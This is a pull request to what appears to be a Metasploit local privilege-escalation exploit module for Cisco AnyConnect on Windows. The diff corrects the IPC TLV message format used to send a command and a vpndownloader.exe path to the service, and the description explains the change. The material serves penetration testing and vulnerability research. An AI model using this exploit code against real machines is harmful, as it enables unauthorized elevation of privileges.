### PR TITLE
Fixed AnyConnect IPC message format:

### DIFF
--- a/modules/exploits/windows/local/anyconnect_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_lpe.rb
@@ -103,6 +103,7 @@ class MetasploitModule < Msf::Exploit::Local
   # See AnyConnect IPC protocol articles:
   # - https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
   # - https://www.serializing.me/2016/12/20/anyconnect-elevation-of-privileges-part-2/
+  # - https://www.serializing.me/2023/01/27/anyconnect-inter-process-communication/
   class CIPCHeader < BinData::Record
     endian :little
 
@@ -118,10 +119,16 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   class CIPCTlv < BinData::Record
+    # TLVs are tricky when it comes to endieness. For the type and length fields, they're big endian, but
+    # for the value, they're little endian. For example, each UTF-16 character, is encoded in one little
+    # endian unsigned short. There is one exception to that rule: UTF-8 strings and TV (Type and Value)
+    # entries. Note that TVs, are the ones that have a Type like 0x80XX, which are used to store some
+    # booleans and unsigned shorts.
+    # This is why having the entire "BinData::Record" as big endian is not a problem in this case: the IPC
+    # message to which the vulnerabilit(ies) are associated, only makes use of UTF-8 strings and a boolean.
     endian :big
 
-    uint8 :msg_type, label: 'Type'
-    uint8 :msg_index, label: 'Index'
+    uint16 :msg_type, label: 'Type'
     uint16 :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
     stringz :msg_value, label: 'Value', length: -> { msg_length }
   end
@@ -254,13 +261,11 @@ class MetasploitModule < Msf::Exploit::Local
 
     cipc_msg = CIPCMessage.new
     cipc_msg.body << CIPCTlv.new(
-      msg_type: 0,
-      msg_index: 2,
+      msg_type: 2,
       msg_value: cac_cmd
     )
     cipc_msg.body << CIPCTlv.new(
-      msg_type: 0,
-      msg_index: 6,
+      msg_type: 6,
       msg_value: "#{@installation_path}\\vpndownloader.exe"
     )
 


### PR DESCRIPTION
- Made an error in the original research where the TLV had a type and a index, when it only has a type and a modifier that makes it into a TV (Type and Value, no Length).
- A TV has its value where the Length would be on a TLV.
- Also added a note on the endieness being correct/working because endieness has no impact in the message being used to exploit the vulnerability.

This PR is a small quality correction and doesn't add/remove any functionality.